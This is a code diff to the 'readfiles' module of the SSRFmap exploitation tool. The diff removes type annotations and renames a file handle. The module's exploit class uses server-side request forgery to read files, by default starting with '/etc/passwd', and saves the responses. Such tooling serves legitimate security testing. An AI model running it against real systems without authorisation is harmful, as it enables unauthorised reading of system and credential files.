@@ -4,8 +4,6 @@ from argparse import ArgumentParser
 
 from levo_commons.status import Status
 
-from ssrfmap.core.config import SsrfmapConfig
-from ssrfmap.core.requester import Requester
 from ssrfmap.core.utils import diff_text, wrapper_file
 
 name = "readfiles"
@@ -15,7 +13,7 @@ documentation: list[str] = []
 
 
 class exploit:
-    def __init__(self, requester: Requester, args: SsrfmapConfig):
+    def __init__(self, requester, args):
         logging.info("Module '{}' launched !".format(name))
         self.files = args.targetfiles or [
             "/etc/passwd",
@@ -57,8 +55,8 @@ class exploit:
                             f, directory + "/" + filename
                         )
                     )
-                    with open(directory + "/" + filename, "w") as g:
-                        g.write(diff)
+                    with open(directory + "/" + filename, "w") as f:
+                        f.write(diff)
 
         else:
             logging.info("Empty response")
